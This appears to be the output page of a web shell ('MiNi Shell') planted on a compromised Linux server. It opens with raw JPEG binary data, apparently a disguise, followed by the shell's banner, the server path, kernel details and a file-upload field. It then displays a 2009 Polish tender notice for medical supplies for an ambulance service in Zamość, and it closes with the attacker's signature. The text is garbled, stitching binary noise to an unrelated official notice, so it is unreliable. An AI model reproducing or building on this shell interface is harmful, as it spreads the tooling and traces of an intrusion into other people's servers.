JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090528/81685-N-2009.html

<p class="kh_header"><b>Zamość: Dostawa wyrobów medycznych i środków dezynfekcyjnych dla Samodzielnej Publicznej Stacji Pogotowia Ratunkowego i Transportu Sanitarnego w Zamościu</b><br>
<b>Numer ogłoszenia: 81685 - 2009; data zamieszczenia: 28.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielna Publiczna Stacja Pogotowia Ratunkowego i Transportu Sanitarnego , ul. Starowiejska 23, 22-400 Zamość, woj. lubelskie, tel. 084 6384065, faks 084 6271196.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pogotowie-zamosc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyrobów medycznych i środków dezynfekcyjnych dla Samodzielnej Publicznej Stacji Pogotowia Ratunkowego i Transportu Sanitarnego w Zamościu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa wyrobów medycznych i środków dezynfekcyjnych dla Samodzielnej Publicznej Stacji Pogotowia Ratunkowego i Transportu Sanitarnego w Zamościu.

Przedmiot zamówienia podzielony został 5 zadań:  
    
Zadanie  Nr 1 - Materiały opatrunkowe,                                         
Zadanie  Nr 2 - Środki dezynfekcyjne,                                                      Zadanie  Nr 3 - Rękawiczki jednorazowego użytku (zabiegowe),    
Zadanie  Nr 4 - Pojemniki na odpady medyczne,                              
Zadanie  Nr 5 - Igły doszpikowe..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.00-1, 33.63.16.00-8, 33.14.14.20-0, 34.92.84.80-6, 33.14.13.20-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia ubiegać się mogą wykonawcy spełniający następujące warunki:
      
1) Posiadają uprawnienia do wykonywania określonej działalności lub czynności, 
    jeżeli ustawy nakładają obowiązek posiadania takich uprawnie;
2) Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem
    technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią 
    pisemne zobowiązanie innych podmiotów do udostępnienia potencjału 
    technicznego i osób zdolnych do wykonywania zamówienia;
3) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
    zamówienia;
4) Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty i oświadczenia wymagane celem potwierdzenia spełnienia warunków udziału w postępowaniu:

1) Oświadczenie wykonawcy o spełnieniu warunków udziału w postępowania 
    o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych 
    z 29 stycznia 2004 r. z późn. zm. -  druk w załączeniu;
2) Oświadczenie, że wykonawca nie podlega wykluczeniu z postępowania 
    o udzielenie zamówienia publicznego na podstawie art. 24 ust.1 i ust.2 ustawy
    Prawo zamówień publicznych z 29 stycznia 2004 r. z późn. zm. - druk
    w załączeniu;

Dokumenty wymagane celem potwierdzenia, że wykonawca posiada uprawnienia 
do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień:

1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie 
    do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
    do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony 
    nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2) Koncesja, zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek posiadania 
    koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie 
    objętym zamówieniem; 
3) Aktualna informacja z Krajowego Rejestru  Karnego w zakresie określonym w art.
    24 ust.1 pkt 4 - 8 ustawy Pzp (informacja musi dotyczyć wszystkich 
    wymienionych w dokumencie potwierdzającym status prawny wykonawcy 
    członków władz), wystawiona nie wcześniej niż 6 miesięcy przed terminem  
    składania ofert;	
4) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 
    24 ust.1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed terminem
   składania ofert;
5) Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz 
    właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego 
    Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie 
    zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne 
    i społeczne, lub zaświadczenie, że wykonawca uzyskał przewidziane prawem  
    zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub 
    wstrzymanie w całości wykonania decyzji właściwego organu  - wystawione nie
    wcześniej niż 3 miesiące przed upływem terminu składania ofert.

Dokumenty wymagane celem potwierdzenia, że wykonawca posiada  niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia:
 
1) Wykaz trzech dostaw, wykonanych w okresie ostatnich trzech lat przed dniem 
    wszczęcia przedmiotowego postępowania, a jeżeli okres prowadzenia 
    działalności jest krótszy - to w tym okresie, odpowiadających swoim rodzajem 
    i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem 
    przedmiotu zamówienia, ich wartości, daty wykonania i odbiorców, oraz 
    załączenia dokumentów potwierdzających, że dostawy te zostały wykonane 
    należycie - oddzielnie na każde zadanie - druk w załączeniu,
    oraz załączyć dokumenty potwierdzające, że dostawy te zostały wykonane 
    należycie.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium 
Rzeczypospolitej Polskiej ma zastosowanie § 2 Rozporządzenie Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane i z dnia 16 października 2008 r. zmieniające Rozporządzenie w sprawie rodzaju dokumentów jakich może żądać zamawiający od wykonawcy oraz form 
w jakich te dokumenty mogą być składane. Dokumenty należy składać w formie 
oryginałów lub kopii, potwierdzone za zgodność z oryginałem przez uprawnionego    przedstawiciela wykonawcy. 
                                           
Pozostałe dokumenty, informacje i oświadczenia, które musi zawierać oferta :

1. Wypełniony formularz oferty wg załączonego druku  
    - oferta cenowa, sporządzona dla każdego zadania oddzielnie - do wypełnienia 
    załączone tabele asortymentowo - ilościowa na każde zadanie;
2. Dane o wykonawcy - druk w zał.
3. Oświadczenie o posiadaniu przez wykonawcę na oferowany przedmiot 
   zamówienia ważnych w terminach, wymaganych prawem aktualnych 
   dokumentów dopuszczających do obrotu i stosowania na terytorium 
   Rzeczypospolitej Polskiej,  zgodnie z obowiązującymi w tym zakresie przepisami.
   Na każde żądanie zamawiającego, wykonawca przedłoży odpowiednie 
   dokumenty, potwierdzające dopuszczenie do obrotu i stosowania na terenie 
   Polski na oferowany przedmiot zamówienia. 
4. Deklaracja Wykonawcy (producenta) o spełnieniu wymagań zasadniczych,  
    certyfikat jednostki notyfikowanej dla oferowanych wyrobów medycznych -    
    zgodnie z ustawą o wyrobach medycznych;
5. W zadaniu nr 1- dla materiałów opatrunkowych wymienionych pod poz. 3, 4, 5, 
    6, 13 - wymagana klasa IIa wg klasyfikacji wyrobów medycznych - wykonawca 
    zobowiązany jest ostarczyć odpowiednie dokumenty, potwierdzające ten 
    warunek;
6. W zadaniu Nr 2 
    a) dołączyć dokumenty, potwierdzające działanie bójcze oferowanych 
        preparatów, potwierdzające między innymi równoważność danego środka,
    b) dołączyć pozwolenie na obrót produktami leczniczymi, dotyczące preparatów 
        do dezynfekcji skóry, oraz pozwolenie na obrót produktami bójczymi, wydane 
        przez uprawniony organ,
    c) dołączyć oświadczenie, że wykonawca posiada na wszystkie zaoferowane 
        środki dezynfekcyjne karty charakterystyki, które zobowiązuje się dostarczyć 
        zamawiającemu w dniu podpisania umowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pogotowie-zamosc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielna Publiczna Stacja Pogotowia Ratunkowego i Transportu Sanitarnego 
w Zamościu ul. Satrowiejska 23, 22-400 Zamość, pok. 213.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2009 godzina 12:00, miejsce: Samodzielna Publiczna Stacja Pogotowia Ratunkowego i Transportu Sanitarnego 
w Zamościu ul. Satrowiejska 23, 22-400 Zamość, pok. 211(sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Materiały opatrunkowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 21 pozycji asortementowych.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Środki dezynfekcyjne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 14 pozycji asortymentowych.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Rękawiczki jednorazowego użytku (zabiegowe).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 6 pozycji asortymentowych.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pojemniki na odpady medyczne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3 pozycje asortymentowe.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.80-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Igły doszpikowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2 pozycje asortymentowe.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com